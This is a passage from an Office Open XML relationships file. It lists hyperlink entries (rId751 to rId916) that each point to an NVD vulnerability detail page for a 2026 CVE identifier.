Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69809" TargetMode="External" Id="rId751" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69852" TargetMode="External" Id="rId752" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69881" TargetMode="External" Id="rId753" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69890" TargetMode="External" Id="rId754" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69929" TargetMode="External" Id="rId755" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69930" TargetMode="External" Id="rId756" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70065" TargetMode="External" Id="rId757" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70124" TargetMode="External" Id="rId758" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70570" TargetMode="External" Id="rId759" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70579" TargetMode="External" Id="rId760" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70587" TargetMode="External" Id="rId761" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71330" TargetMode="External" Id="rId762" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72923" TargetMode="External" Id="rId763" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72928" TargetMode="External" Id="rId764" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72932" TargetMode="External" Id="rId765" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72943" TargetMode="External" Id="rId766" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72949" TargetMode="External" Id="rId767" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72954" TargetMode="External" Id="rId768" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72989" TargetMode="External" Id="rId769" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73017" TargetMode="External" Id="rId770" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75998" TargetMode="External" Id="rId771" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77101" TargetMode="External" Id="rId772" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77102" TargetMode="External" Id="rId773" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77103" TargetMode="External" Id="rId774" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77104" TargetMode="External" Id="rId775" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77108" TargetMode="External" Id="rId776" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77494" TargetMode="External" Id="rId777" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77498" TargetMode="External" Id="rId778" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77499" TargetMode="External" Id="rId779" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77501" TargetMode="External" Id="rId780" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77502" TargetMode="External" Id="rId781" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77886" TargetMode="External" Id="rId782" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77888" TargetMode="External" Id="rId783" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77889" TargetMode="External" Id="rId784" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77890" TargetMode="External" Id="rId785" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77893" TargetMode="External" Id="rId786" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77895" TargetMode="External" Id="rId787" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77898" TargetMode="External" Id="rId788" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78523" TargetMode="External" Id="rId789" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78574" TargetMode="External" Id="rId790" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78837" TargetMode="External" Id="rId791" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79377" TargetMode="External" Id="rId792" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79378" TargetMode="External" Id="rId793" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79572" TargetMode="External" Id="rId794" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79575" TargetMode="External" Id="rId795" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81355" TargetMode="External" Id="rId796" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81381" TargetMode="External" Id="rId797" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81790" TargetMode="External" Id="rId798" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83989" TargetMode="External" Id="rId799" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84001" TargetMode="External" Id="rId800" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85400" TargetMode="External" Id="rId801" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86075" TargetMode="External" Id="rId802" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86711" TargetMode="External" Id="rId803" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86721" TargetMode="External" Id="rId804" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86728" TargetMode="External" Id="rId805" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19651" TargetMode="External" Id="rId806" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69347" TargetMode="External" Id="rId807" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71375" TargetMode="External" Id="rId808" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76196" TargetMode="External" Id="rId809" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78461" TargetMode="External" Id="rId810" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81383" TargetMode="External" Id="rId811" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84003" TargetMode="External" Id="rId812" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28613" TargetMode="External" Id="rId813" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28626" TargetMode="External" Id="rId814" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28656" TargetMode="External" Id="rId815" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45528" TargetMode="External" Id="rId816" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69477" TargetMode="External" Id="rId817" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78627" TargetMode="External" Id="rId818" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86806" TargetMode="External" Id="rId819" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76561" TargetMode="External" Id="rId820" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81349" TargetMode="External" Id="rId821" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81806" TargetMode="External" Id="rId822" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82061" TargetMode="External" Id="rId823" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82071" TargetMode="External" Id="rId824" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84387" TargetMode="External" Id="rId825" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86733" TargetMode="External" Id="rId826" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11573" TargetMode="External" Id="rId827" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16769" TargetMode="External" Id="rId828" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20293" TargetMode="External" Id="rId829" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66305" TargetMode="External" Id="rId830" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68835" TargetMode="External" Id="rId831" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68846" TargetMode="External" Id="rId832" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68889" TargetMode="External" Id="rId833" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68893" TargetMode="External" Id="rId834" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69272" TargetMode="External" Id="rId835" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69274" TargetMode="External" Id="rId836" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69296" TargetMode="External" Id="rId837" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69305" TargetMode="External" Id="rId838" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69313" TargetMode="External" Id="rId839" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69314" TargetMode="External" Id="rId840" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69336" TargetMode="External" Id="rId841" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69337" TargetMode="External" Id="rId842" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69338" TargetMode="External" Id="rId843" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69340" TargetMode="External" Id="rId844" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69357" TargetMode="External" Id="rId845" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69358" TargetMode="External" Id="rId846" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69364" TargetMode="External" Id="rId847" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69366" TargetMode="External" Id="rId848" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69384" TargetMode="External" Id="rId849" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69396" TargetMode="External" Id="rId850" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69451" TargetMode="External" Id="rId851" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69460" TargetMode="External" Id="rId852" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69482" TargetMode="External" Id="rId853" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69536" TargetMode="External" Id="rId854" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69553" TargetMode="External" Id="rId855" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69597" TargetMode="External" Id="rId856" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69602" TargetMode="External" Id="rId857" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69688" TargetMode="External" Id="rId858" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69706" TargetMode="External" Id="rId859" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69757" TargetMode="External" Id="rId860" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69761" TargetMode="External" Id="rId861" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69775" TargetMode="External" Id="rId862" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73321" TargetMode="External" Id="rId863" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81781" TargetMode="External" Id="rId864" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81798" TargetMode="External" Id="rId865" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82052" TargetMode="External" Id="rId866" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82054" TargetMode="External" Id="rId867" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82055" TargetMode="External" Id="rId868" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82057" TargetMode="External" Id="rId869" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82058" TargetMode="External" Id="rId870" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82065" TargetMode="External" Id="rId871" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82068" TargetMode="External" Id="rId872" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82070" TargetMode="External" Id="rId873" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82073" TargetMode="External" Id="rId874" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82074" TargetMode="External" Id="rId875" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82076" TargetMode="External" Id="rId876" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84817" TargetMode="External" Id="rId877" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84818" TargetMode="External" Id="rId878" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84820" TargetMode="External" Id="rId879" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86074" TargetMode="External" Id="rId880" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86081" TargetMode="External" Id="rId881" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86713" TargetMode="External" Id="rId882" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86718" TargetMode="External" Id="rId883" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86724" TargetMode="External" Id="rId884" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86725" TargetMode="External" Id="rId885" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86734" TargetMode="External" Id="rId886" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9331" TargetMode="External" Id="rId887" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50349" TargetMode="External" Id="rId888" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58848" TargetMode="External" Id="rId889" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62653" TargetMode="External" Id="rId890" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62654" TargetMode="External" Id="rId891" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62694" TargetMode="External" Id="rId892" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68824" TargetMode="External" Id="rId893" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68825" TargetMode="External" Id="rId894" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68837" TargetMode="External" Id="rId895" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68840" TargetMode="External" Id="rId896" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68847" TargetMode="External" Id="rId897" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68884" TargetMode="External" Id="rId898" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68897" TargetMode="External" Id="rId899" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69275" TargetMode="External" Id="rId900" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69279" TargetMode="External" Id="rId901" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69280" TargetMode="External" Id="rId902" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69281" TargetMode="External" Id="rId903" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69287" TargetMode="External" Id="rId904" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69292" TargetMode="External" Id="rId905" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69299" TargetMode="External" Id="rId906" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69300" TargetMode="External" Id="rId907" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69309" TargetMode="External" Id="rId908" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69310" TargetMode="External" Id="rId909" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69311" TargetMode="External" Id="rId910" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69319" TargetMode="External" Id="rId911" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69331" TargetMode="External" Id="rId912" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69333" TargetMode="External" Id="rId913" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69335" TargetMode="External" Id="rId914" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69341" TargetMode="External" Id="rId915" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69362" TargetMode="External" Id="rId916" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 